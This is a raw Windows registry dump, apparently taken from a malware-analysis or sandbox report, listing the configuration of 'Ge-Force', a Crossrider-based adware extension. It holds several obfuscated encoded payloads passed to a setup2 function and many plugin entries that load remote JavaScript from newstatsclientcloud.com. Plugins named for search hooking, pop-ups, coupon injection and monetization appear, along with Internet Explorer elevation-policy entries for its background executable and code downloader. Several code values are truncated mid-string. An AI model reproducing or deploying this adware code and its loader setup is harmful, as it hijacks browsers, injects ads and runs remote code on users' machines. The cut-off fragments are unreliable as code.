"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWU3MjU0NDI0YTU0NGIwNjExMGMxNTJkMDYwZTQ4NGU0OTRjMGQwYzExMDg0ZTRkNDUxNTE5MDc0YjEyMGExNDE4MWIxZDE1MDUwMjAwMGM0YjFiMWIwZjQ1MTUwZjA4MGMxNDBjMTkwMDA3NDUxNzA1MDcwMDE2MTE0NzEwMGIxOTAwNTQ1NjQzMTkxNTA4MmIwYjBlNDkzNjMxMjYyYTJhMmIyNzMwMjMzMDJjM2MzYTM0MmMzZjNjMzYzNTI3M2MyYzNhMzEyMTI3MmI0NDE5NDU1NDVlNDMwYjU3NDU0NDQ0MTk0NzU0NWU0MzE2MDQxNTExNWYzNTJiMmEzYzJhMmIzNjJhM2QyNjJmMjYzNjJmMzUyODNhMzYzNTJmMmYyYjM2NGM0OTcyNDU1ODU0NDI0ODFjMWQxYTE1MGIzMDBhMTg0MDUwNTQ0YjA2MTEwYzE1MGI0ZTRkNDUxNTE5MDc0YjEyMGExNDE4MWIxZDE1MDUwMjAwMGM0YjFiMWIwZjQ1MTUwZjA4MGMxNDBjMTkwMDA3NDUxNzA1MDcwMDE2MTE0NzEwMGIxOTAwNTQ1NjQzMTkxNTA4MmIwYjBlNDkzNjMxMjYyYTJhMmIyNzMwMjMzMDJjM2MzYTM0MmMzZjNjMzYzNTI3M2MyYzNhMzEyMTI3MmI0NDE5NDU1NDVlNDMwYjU3NDU0NDQ0MTk0NzU0NWU0MzE2MDQxNTExNWYzNTJiMmEzYzJhMmIzNjJhM2QyNjJmMjYzNjJmMzUyODNhMzYzNTJmMmYyYjM2NGM0OTcyNDU1ODU0NDI0ODA0MDUxYjAyMTEwYjMxMTA0MDUwNTQ1ODVlNTE3MjE4', 'extbjtinex'); }"

[HKCU\Software\Ge-Force\Plugins\78]
"Version" = "5"

[HKCU\Software\Ge-Force\Plugins\104]
"Version" = "13"

[HKCU\Software\Ge-Force\Plugins\177]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/177.js"

[HKCU\Software\Ge-Force\Manifest]
"ModeType" = "production"

[HKCU\Software\Ge-Force\Plugins\350]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE3MzRlNTI0NjVhNDAwZDAyMGUxYTJjMWMxZTQ0NDA0MjQ3MWUwZTFlMDk1NDVkNDkxOTA2MGI1ODE5MDUxNzFkMDYwMjFiMTYwNDE4MWYxZTU3MGQxZDBiNTUwYzAyMDMxYjFjMTg0MTFlNDgxMDExNWExNTFiMDcwOTBmMWIwMTE0MmIwMTRiMjUzNTNhM2MzZDM1MjkzMDJjMzIzZjM4MjYyZDMzMmIyYTNkMmMzMjI1MzU1ZjBkMWQxMzE0MTYxNzBmMzkwNTFkMGI0ZjM5MjUyMTM3MzkyOTM5MmIyNzM2MjMyODNkMjYzOTJmMjQyZDNjMmIzOTM5MmQyMTMzMjUzNTVmMGMwMDA5MGQxMTAwMDQzOTA1MWQwYjRmMzkyNTIxMzczOTI5MzkyYjI3MzYyMzI4M2QyNzI0MzUzZDJhMmIyMDM5MjU0NDA0MDYwYTIzM2Q1MzJkMzkzOTMwMmEyNTI5MzgzMDJhMzczNDI1MjMzNTI2MjUyMzNkMzEyZDQwMWIxMjE1MzgxYjA3MWM1MzJkMzkzOTMwMmEyNTI5MzgzMDJhMzczNDI1MjMzNTI2MjUyNDM4MjMzNzM5MjU0NDJjMzQzMzI5NDQzMTJkMjUyODJkMzYyNTI4MjMzZDJiMjAzOTMzMmMzNjIyM2IyNjM1MmIyMDM5MmYzMTIwMjQyNTIzM2QzMTJkNDAwOTE3MDczZjNlNTcyNjMxMzEzNDM1MzEzNjI0MzMyZTNjM2MyZDIzMjIzNjIwMzgzZTJmM2QzMTIxMzMzODNkMmMzMjI1MzU1ZjFjNGYzOTI1MzAyYjMyMjUzNTViNDI3ODQ2NWE0MjQ1NTQxMjFlMGQxZTAxMzMwODBlNDc0YzVhNDgxMTFhMDYxNjA5NTg0YTU5MWU1ODE4NTYxMzUyMGI1YjRiMDUwOTA2NTcwNjA1MDUxZTBjNGIxODFmMWU1NjAwMTUxMzFiMTQw"

[HKCU\Software\Ge-Force\Plugins\94]
"Name" = "IEPopup"

[HKCU\Software\Ge-Force\Installer]
"srcid" = "001729"

[HKCU\Software\Ge-Force\Plugins\13]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/13.js"

[HKCU\Software\Ge-Force\Installer]
"ErrorsDomain" = "http://errors.newstatsclientcloud.com"

[HKCU\Software\Ge-Force\Plugins\37]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/37.js"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Ge-Force\Plugins\36]
"Name" = "IEBackground"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Ge-Force\Plugins\180]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/180.js"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
"AppName" = "Ge-Force-bg.exe"

[HKCU\Software\Ge-Force\Plugins\356]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[356]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(356,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:MAN}))();};"

[HKCU\Software\Ge-Force\Plugins\180]
"Version" = "12"

[HKCU\Software\Ge-Force\Plugins\41]
"Version" = "7"

[HKCU\Software\Ge-Force\Plugins\223]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/223.js"

[HKCU\Software\Ge-Force\Plugins\180]
"Name" = "bpo_serp_m"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Ge-Force\Plugins\40]
"Name" = "IEExtension"

[HKCU\Software\Ge-Force\Plugins\273]
"Version" = "6"

[HKCU\Software\Ge-Force\Plugins\195]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
"Policy" = "3"

[HKCU\Software\Ge-Force\Plugins\253]
"Version" = "2"

[HKCU\Software\Ge-Force\Plugins\2]
"Version" = "2"

[HKCU\Software\Ge-Force\Plugins\39]
"Name" = "IEDatabase"

[HKLM\SOFTWARE\Crossrider]
"Bic" = "589912D45CE0412C9CDE01D4C96E2298IE"

[HKCU\Software\Ge-Force\Plugins\1]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/1.js"

[HKCU\Software\Ge-Force\Plugins\4]
"URL" = "http://js.newstatsclientcloud.com/plugins/javascripts/jquery-1_7_1_min.js"

[HKCU\Software\Ge-Force\Plugins\93]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGU2MTY1NTcxZDE3MDEwMjM2MTUxOTQ5NTY1NTU3MGIwMTA2MTM1ZDVhNDQxYjAyMDI0ZDA2MDcxMzAyMDcwZDA1MDYxZDRkMTYxZDBlNDgwMjE4NDMwNjEzM2MxODEzMGEwOTViMDExZjA1NGEwNzE5MDEwYzEyMDcwODA5NDgxZDBiMDMwODBlMGUxZTFjNGEwMDA2MDYwNzNiMDc1YTE0MDkwZjUzMzYzNzNjMzY1ZTM4MmEyODNlM2EyNjMwMjczYjI3MjIyNzM0MjkyZDIxMjYzYjM2MjYyMzJhMzgzOTM3MmEyYTMxMmQzYzQxMDUwYTFlMDExYjA2MDcxYzAyMGExMDU2MzMyYTM2MzEzYTIxMzAzNTNjMmYyOTI3MmEyMjI1MjIzYzI5MzQyNjI5MmEyYTQxNTk3ODZhNDUxZDFmMTgwNTA2MzYwNzFlNDE1ZDU1NDkwNDAxMDExMzA2NDg0YzQ4MDIxYzFiNWIwNjE2MDUxNzExMDExYzE4MDQ1YjE2MGMxODVkMTQxNDVhMTgwYTJhMTgwMjFjMWM0ZDBkMDYxYjUzMTExOTEwMWEwNzExMDQxMDU2MDQxZDAzMTkxODFiMDgxMDUzMWUxZjEwMDcyYTExNGYwMjA1MTY0ZDJmMjEzYzI3NDgyZDNjMjQyNzI0M2YyNjI3MmEzMTM3MzEzODMwMzMzODMwM2IyNzMwMzYzYzM0MjAyOTMzM2MzMTNjMmE1NDEzMDYwNzFmMDIxMDA3MGQxNDFmMDY1YTJhMzQyZjI3M2EzMDI2MjAyYTIzMzAzOTMzMzQyNTMzMmEzYzIyMmEzMDM0MzM1NzU5Njk3YzUwMTMwYjAwMGMwNTFiM2MwNzU3NDg0MzVlNDY2MTEx', 'ukluucurcg'); }"

[HKCU\Software\Ge-Force\Plugins\286]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE2YjU2NTU1MTQ4NTcwYTAyMDQxYTM0MDQxOTUzNTI1NTQwMWUwNDFlMTE0YzVhNWUwYjExMGM1ODEzMDUwZjA1MDExNTA5MDEwMzE4MTUxZTRmMTUxYTFjNDcwNjEyNTkxYTFiNGYxYzA2NGUwYjE0MGYwNjExMDMwNjE4M2MxNTU1MmEzZDM1MjIyNTMyMjUyNzM4MmMzMDMwMjkzMzJiMmMyNjJhMzgyYzJhM2Q1MDEzMDUxNDE4MDEwMzExMzYwZDEyMTU1NzNlMjkzNjIzMjcyNjMxMjQzOTJlMjQyNDJhMzIyNzIwMmMyMjIyMzMzZTM1M2EzNTJkMmEzZDUwMTExYTExMzgxNDFjMGQ0ODNkMjkzMzM4MmUyNTI2MjMyMTMxMjcyNDJmMmIzMTI2MmEzZjI5MzgyNzI5MmY0ODRkN2M1NTUxNDg1NTQwMWUwNDFlMTEwNTIwMDMwNDU3NTg1NjUyMDIxNTAyMDUwMjUyNWE0ZDEyNDIwYjU5MTc0MTAwNTE1YjExMDUxYzQ0MDkwMTE2MTUwNjViMGMxMzA0NDUxMjA2NWExYjE5NWIwODA1NGYwOTAwMWIwNTEwMDExMjBjM2YxNDU3M2UyOTM2MjMyNzI2MzEyNDM5MmUyNDI0MmEzMjI5MzgzMjI5MzkyZTNlMjk1MzEyMDcwMDBjMDIwMjEzMjIxOTExMTQ1NTJhM2QzNTIyMjUzMjI1MjczODJjMzAzMDI5MzMyNTM0MzgyMTIzMzEyYTIxMzkzNDJmM2UyOTUzMTAxODA1MmMxNzFkMGY1YzI5MmEzMjNhM2EzMTI1MjIyMzI1MzMyNzJlMjkyNTMyMjkzZTJiMmMzMzJhMmU0YTU5Njg1NjUwNGE0MTU0MDUxZDFkMTIwYjE4MzkwZTQzNGM1NTQzNTA0MzY4MGI=', 'javuqhubvp'); }"

[HKCU\Software\Ge-Force\Plugins\9]
"Name" = "search_engine_hook"

[HKCU\Software\Ge-Force\Plugins\195]
"Version" = "28"

[HKCU\Software\Ge-Force\Plugins\46]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/46.js"

[HKCU\Software\Ge-Force\Manifest]
"homepageurl" = "NA"

[HKCU\Software\Ge-Force\Plugins\356]
"Version" = "1"

[HKCU\Software\Ge-Force\Plugins\14]
"Version" = "11"

[HKCU\Software\Ge-Force\Plugins\301]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/301.js"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
"AppName" = "Ge-Force-codedownloader.exe"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
"AppPath" = "%Program Files%\Ge-Force"

[HKCU\Software\Ge-Force\Plugins\104]
"Name" = "jollywallet_m"

[HKCU\Software\Ge-Force\Plugins\200]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/200.js"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"DisplayName" = "Ge-Force"

[HKCU\Software\Ge-Force\Plugins\22]
"JavaScript" = "(function(a){appAPI.queueManager={queue:[],register:function(b){this.queue.push(b);}};appAPI.ready=function(c,b){a.when.apply(null,appAPI.queueManager.queue).then(function(){a.when(appAPI.initializerPlugin.isReady(b)).then(function(){new Function('if (typeof jQuery === undefined) { jQuery = $jquery_171; }(' appAPI.resources.parseIncludeJS(c.toString()) )($jquery_171))();});});};}($jquery_171));var CrossRiderResourcesManager=(function(z){var B={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.resources,env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:appAPI.debugManager.isDebug()&&appAPI.debugManager.getResourcesPath(),isIE7:z.browser.msie&&z.browser.version*1==7},x=new z.Deferred(),h=K(meta)||{},D=K(remote_resources)||{remoteId:0},e=K(queue)||{},g=initialVersion=K(lastVersion)||0;return z.Class.extend({init:function(){appAPI.queueManager.register(x.promise());if(B.isDebug){x.resolve();}elR"

[HKCU\Software\Ge-Force\Plugins\37]
"Version" = "6"

[HKCU\Software\Ge-Force\Manifest]
"UpdateInterval" = "360"

[HKCU\Software\Ge-Force\Plugins\43]
"Version" = "5"

[HKCU\Software\Ge-Force\Installer]
"osName" = "XP32"

[HKCU\Software\Ge-Force\Plugins\223]
"Version" = "9"

[HKCU\Software\Ge-Force\Plugins\177]
"Version" = "2"

[HKCU\Software\Ge-Force\Plugins\36]
"Version" = "8"

[HKCU\Software\Ge-Force\Manifest]
"PublisherName" = "iWebar"

[HKCU\Software\Ge-Force\Plugins\183]
"Version" = "4"

[HKCU\Software\Ge-Force\Plugins\35]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
[HKCU\Software\Ge-Force\Plugins\263]
"Version" = "3"

[HKCU\Software\Ge-Force\Plugins\14]
"JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n
[HKCU\Software\Ge-Force\Plugins\200]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTc2NjY1NGQxODEyMTcwNjMzMDAwMDRlNTY0ZjUyMGUxNzAyMTY0ODQzNDMxZTFhMWMwMzEwNTgwMDFkMTQxNTA4MGExMTBhNGQxNTA5MWY0MzFhNWQ0MTQwNDkxNDFlMGYwNjA5MDAwNTFjMDQ0OTUyNDY1MTQyNDMzMzMzMmMyMjI5MzAyNTM0M2IyODI5M2UzMDM1M2UzNzMzMjgzNjI5MjgzMzNjMjUyNDNjM2YyMjJkMzM1MzFjMGUwMjEyMGQxMzE0M2MwZDAxMDk1MjJmMzkyMDI0MjkyMTNmM2UyNTJiMzUzNDNjMzczNjIyMzMyMjJkMjIzNTM5M2M1NDRhNzg2NTRlMDQxYjA0MTYxMDIzMTQxZTRlNTY0YzRkMTgxMjE3MDYxNTQ4NDM0MzFlMWExYzAzMTA1ODAwMWQxNDE1MDgwYTExMGE0ZDE1MDkxZjQzMWE1ZDQxNDA0OTE0MWUwZjA2MDkwMDA1MWMwNDQ5NTI0NjUxNDI0MzMzMzMyYzIyMjkzMDI1MzQzYjI4MjkzZTMwMzUzZTM3MzMyODM2MjkyODMzM2MyNTI0M2MzZjIyMmQzMzUzMWMwZTAyMTIwZDEzMTQzYzBkMDEwOTUyMmYzOTIwMjQyOTIxM2YzZTI1MmIzNTM0M2MzNzM2MjIzMzIyMmQyMjM1MzkzYzU0NGE3ODY1NGUxYzAzMDUwMTBhMTgyZjE2NGU1NjRjNWQ0MDU2NjkwYg==', 'lllopfcvfr'); }"

[HKCU\Software\Ge-Force\Plugins\281]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY3ZjYyNWEwNDEyMDYwYTI3MGIxODU3NTE1ODRlMGUwNjBlMDI0MzViNWEwODE0MDcwYjFkMTQ1YzFhMWIxODQ0MTkwODM1MTcwODA0MWM1YjEyMGUwYzM4MDcxNTQ1MTExMDEwNDgzNDI3MmYzNDNkMjkyMTJiM2QzMTJlMmEzMzIzMmEyZTM3MzczMDMwMmYyNzNmMzMzMDI1M2IzZDJiMmE0ZDA4MDUwMjRmNGI0MzQ5NDY0NDRkMGMxNTE2MTc0NzFiMTcxZTEwMDgwYzRhMDcwMjBhM2MxODE5MTA1NjI3MzMyNTIwMzUyMTJhMjYzYzJmM2QzZTM5MzMyYTIyMjYzYTM0MjYzZDMzMzk1MDU2Nzg3MDU2MDUwNzBkMGIwZjFjMzMxNjViNGU1NTU5NDA1ZDZjMGY=', 'tukxlfrzry'); }"

[HKCU\Software\Ge-Force\Plugins\94]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/94.js"

[HKCU\Software\Ge-Force\Installer]
"subid" = "0"

[HKCU\Software\Ge-Force\Plugins\183]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=__TABS_ON_UPDATED_ACTIVE_KEY;var c=__tabsOnUpdateActive__;var a={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(!appAPI.utils.isFunction(appAPI.internal.globalEval)){appAPI.internal.globalEval=function(e){(new Function(e)).apply(window);};}if(appAPI.internal.scope==a.SCOPE.BACKGROUND){appAPI.tabs.reloadTab=function(e){if(typeof e.delay===number){appAPI.setTimeout(function(){appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});},e.delay);}else{appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});}};appAPI.tabs.executeScript=function(e){appAPI.message.toAllTabs(e,{channel:__tabsExecuteScript__});};appAPI.tabs.onTabUpdated=function(e){if(typeof e!==function){return;}appAPI.message.addListener({channel:__tabsOnTabUpdated__},function(f){e(f);});appAPI.internal.db.set(d,true);appAPI.message.toAllTabs({},{channel:c});};}else{if(appAPI.internal.scope==a.SCOPE.PAGE&&!appAPI.dom.isIframe()){var b=functi"

[HKCU\Software\Ge-Force\Plugins\253]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/253.js"

[HKCU\Software\Ge-Force\Plugins\221]
"Name" = "icm_downloads_m"

[HKCU\Software\Ge-Force\Manifest]
"IsButtonEnabled" = "false"

[HKCU\Software\Ge-Force\Plugins\288]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTg2ZTU3NDU1MTRiNGQwZTBlMDMxMzMxMDUwOTUzNTE0ZjQ0MTIwMzE3MTQ0ZDRhNWUwMjFjMTIxYjAzMGEwNzU5MDExMDFmMGUwMDFiMDQxNzAzMDIxNzA0NDUwNjA4MWMxODRjMDIxODRhMWMwMjAxNDkxOTA1MTIwNzU5MGYwMjU0MDcwZjFlNGEzYzNiMzQzNzNlMzgzYzM0MzMzMzI2MzYyODMwMjIyZTNkMzkzMzMzM2MzYjUxMDcxZjBhMDIwMzQ3MjgzYzI3MjUyYTIyMzgzZDJmM2UzMjMxM2IzNjM1MjEzNDIxMjczNzMyM2MzYjUxMTYwNDA5MDYwMjQ3MjgzYzI3MjUyYTIyMzgzZDJmM2UzMjMxM2IzMjNkMjUyZTIxMjIzZjMzM2MzNzIyMjcyZTIyMmIzOTI1NTU0ZjZlNTc0NTUxNGI0ZDE2MTYwMjA0MGQxOTJjMTU0OTU1NDY0ODRmNWI2ZTBh', 'cdweqkofzw'); }"

[HKCU\Software\Ge-Force\Plugins\337]
"URL" = "http://js.newstatsdemosrv.com/plugins/mins/337.js"

[HKCU\Software\Ge-Force\Plugins\288]
"Version" = "1"

[HKCU\Software\Ge-Force\Plugins\21]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/21.js"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKCU\Software\Ge-Force\Plugins\41]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""

[HKCU\Software\Ge-Force\Plugins\262]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY2MTUyNDE0NzU3NDcwZTEyMDAxNDNlMDAwZDQ1NGQ0NTQ0MGUwMDEwMWI0ODRlNDgxNDAxMDgwNTE1MDcwMzE3NTA0YTE2NGIwNzBkMTUwOTBhMWIwOTAzNTkwYjAzMTI1YjE3MWUxMDRlMTE0NDU3NTc1ZjE2MDA0NDJkM2UyNDI1MmEzNTM1MjYyZDJmMzczMzM4MzIzZDMyMjMzYTIwMmUzNjNlMzQyMjI3MzkyZjMwM2IzNDVkMGQ0OTFkMTY1OTE2MWQwMDU2NDM1NjU1NDc0MzAzMWUwMDU5MzQyZDIyMzUzODM2MzUzNDNkMjAyZTIwM2UyNjI3MzUzOTI4MzUyOTJlMmQzZTQxMDQxYzE1MTIxMTA5MDIxNjVjMzgyODI2MzQyOTI3MzczOTNiMjUyMjI1M2EyZjI4MjczMDJhM2UyZDIyMjUzYTMzMzUzMTM2MzQzYjI1MzgyODQ3NGE2YzU0NDQ0YjUyNDMwZjAzMTExNjE1MjExNjA3NTA1YjQ3NTUwZDEyMTIwNDE3NTE1ZDRlMDQxMzBiMDUwNzE3MGMwZTQzNGMwNjU5MDQwZDA3MTkwNTAyMWEwNTQ5MTkwMDEyNDkwNzExMDk1ZDE3NTQ0NTU0NWYwNDEwNGIzNDJkMjIzNTM4MzYzNTM0M2QyMDJlMjAzZTIyMmYzMTIzMjgzMDIxMmYyZDMyMzIzNTNhMmYyMjJiM2I0NDFlNGYwZDA0NWExNjBmMTA1OTVhNDU1MzU3NTEwMDFlMTI0OTNiMzQzMTMzMjgyNDM2MzQyZjMwMjEzOTJkMjAzNzI3M2EyODI3MzkyMTM0MmQ0NzE0MGUxNjEyMDMxOTBkMGY0ZjNlMzgzNDM3MjkzNTI3MzYyMjM2MjQzNTI4MmMyODM1MjAyNTI3M2UyNDM1MjgzMDM1MjMyNjNiMjIzNjNlMzg1NTQ5NmM0NjU0NDQ0YjUwMTEwYjAyMDIw"

[HKCU\Software\Ge-Force\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,7,9,345,354,253,93,102,104,123,180,184,192,220,195,200,221,223,242,263,273,281,286,301,177,91,28"

[HKCU\Software\Ge-Force\Plugins\7]
"Version" = "2"

[HKCU\Software\Ge-Force\Plugins\246]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/246.js"

[HKCU\Software\Ge-Force\Plugins\47]
"Version" = "3"

[HKCU\Software\Ge-Force\Plugins\221]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/221.js"

[HKCU\Software\Ge-Force\Plugins\3]
"Name" = "ie8_fix_2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Ge-Force\Plugins\93]
"Version" = "14"

[HKCU\Software\Ge-Force\Plugins\273]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWE3ZTUxNDI0YzRiNGQwYzEyMDAxMTIxMDMwZTRlNTE0ZjQ2MGUwMDE1MDQ0YjRkNDMwODA1MTc0ODE4MDgxYTFhMDAwMzA3MDYwNzQ4MTcwZTE5NWUxMTBmMDExYzRiMDUxZTEyNWIxMjE2MTQwMTFjNGEwYzA3NWUxNTE3MDQzMzAyMGI1OTU3NDU1NTQxNTcxMTE5MDkwZTAyMDAyYjA4MTA0YzNkMzMyODNkMmIzNTI3MzMzZDM1MjczZTM0MmEzYzMyMzEyZjMwMzQyNjMzMzgzYTI2MzkzZDI1MmIyZTQ0MWYwOTFkMDUwODEwNWMyYjJlMjEzZTI0M2MzNzM0M2QyNTMxMjMzZDJkM2IzZjNiMjgzNTJjMzEyZTNkNGU0NzY1NDQ0NjU0NDE1NjE5MTYxODFiMWMzMTE0MTg0MzRlNTE0MDA0MWYxYjE0MTU0ZTRlNWIxMjA4MWY0NTAzMGQwODFmMDMxYjFkMGIwZjQ1MGMwYjBiNWIxMjE3MWIxMTQzMDgwNTE3NDkxNzE1MGMxYjExNDIwMTFjNWIwNzEyMDcyYjE4MDY1MTVhNWU1MDUzNTIxMjAxMTMwMzBhMGQzMDBkMDI0OTNlMmIzMjMwMjMzODNjMzYyZjMwMjQyNjJlMjczNDNmMmEyYTIyMzEyNTJiMjIzNzJlMzQyNjIwMzkyYjQ3MDcxMzEwMGQwNTBiNTkzOTJiMjIyNjNlMzEzZjM5MjYyMDIzMjYzZTM1MjEzMjMzMjUyZTI5MjMyYjNlNTY1ZDY4NGM0YjRmNDQ0NDA0MGQwMTE2MGIwMjIyMGI0NjVjNTQ1MzQzNDI2ODEx', 'atqblkodft'); }"

[HKCU\Software\Ge-Force\Plugins\182]
"Name" = "openUrl"

[HKCU\Software\Ge-Force\Plugins\17]
"Version" = "4"

[HKCU\Software\Ge-Force\Plugins\263]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/263.js"

[HKCU\Software\Ge-Force\Plugins\28]
"JavaScript" = "var CrossriderInitializerPlugin=(function(e){var c={appId:appAPI._cr_config.appID()},b,g=new e.Deferred(),f;return e.Class.extend({init:function(){b=this;e(document).ready(function(){if(!f){d();}e(body).bindExtensionEvent(__CR_REQUEST_READY,a);});},isReady:function(h){if(h===false){d();}return g.promise();}});function d(){g.resolve();f=true;}function a(){e(body).fireExtensionEvent(__CR_RESPONSE_READY,{appId:c.appId});}}($jquery_171));(function(a){appAPI.initializerPlugin=new CrossriderInitializerPlugin();}($jquery_171));"

[HKCU\Software\Ge-Force\Plugins\182]
"Version" = "3"

[HKCU\Software\Ge-Force\Plugins\28]
"Name" = "initializer"

[HKCU\Software\Ge-Force\Manifest]
"Name" = "Ge-Force"

[HKCU\Software\Ge-Force\Plugins\180]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTU2MDY1NDUxYTE5MWIxZTMyMTAwMjQ4NTY0NzUwMDUxYjFhMTc1ODQxNDUwZDQ5MDYwYjE3MDcxNjRjMGQwNTAxNDgxMzQzMWYwNjE3NWQ1ODU4NWExNTE3MGI1ZDUzMzgzZDJkMzgyMzM0MjEzZjI2MmEyMjMwMzEyZjM0MzMzNzIzMmIyYjIzM2QzZDNmMmUzODNiMjkzMDMxNDE1NDVjNWMyMjA2MWYwODUyMzEzODIxM2MyNTNmMzQyMDI0MmIyYjM1M2QyZjNhM2MzODNjMmMyMjJiMzgzZDQ4NWM1ZTUxMDAwODA5NWQ1YTNkMzEyOTNlMjgyMTNlM2QyNzIzMjczYzM1MzkzNDM3M2YzMDI3MjMzZDMxNGM1YTU1NDQxZjBhMDg1NjVmNTg1OTViNTU0NDBiNTg1ZDUwNTE1OTU4NWE1ZTQ0NTk1OTViNTA1MDQ4MWUwOTBlMTY1MDMwMzEyNDMwMjEzOTNmMzUzYjI5MmEzYzM4MjMzZTNhMzMyZTM2MzIzMDQ4MTMxNzA3MGU1MTM4MmQyZTNkMjEzNDMxM2MyMzI4MjIyMDMyMjYyMDM0MzYyZjI2MjAyMjIwMzIzYTNkMjIzMDMxMjMyODM4MmQ0ZjQzNjQ2ZTQwMDYxZTE4MTcwMTM4MWQwMjQ1NTg0ZTQ4MDQxMzA2MWQxYzU0NDg0ZDBmNDQxODAxMGEwNDFlNDAwNDBkMDM0NTBkNDkwMjA1MWY1MTUxNTA1ODE4MDkwMTQwNTAzMDMxMjQzMDIxMzkzZjM1M2IyOTJhM2MzODI3MzYzZTI5MjkzNjI4MmIzMTM0MzcyYzM1MjUyMzJkMzI0OTU4NTU1NDIwMGIwMTAyNGYzMjMwMmQzNTJkM2QzOTNlMmUzNjI4M2QzMTI2MzIzZTM1MjIyNjNmMjgzMDMxNDE1NDVjNWMxZTAyMTQ1ZTUyMzEzODIxM2MyNTNmMzQyMDI0MmI"

[HKCU\Software\Ge-Force\Plugins\177]
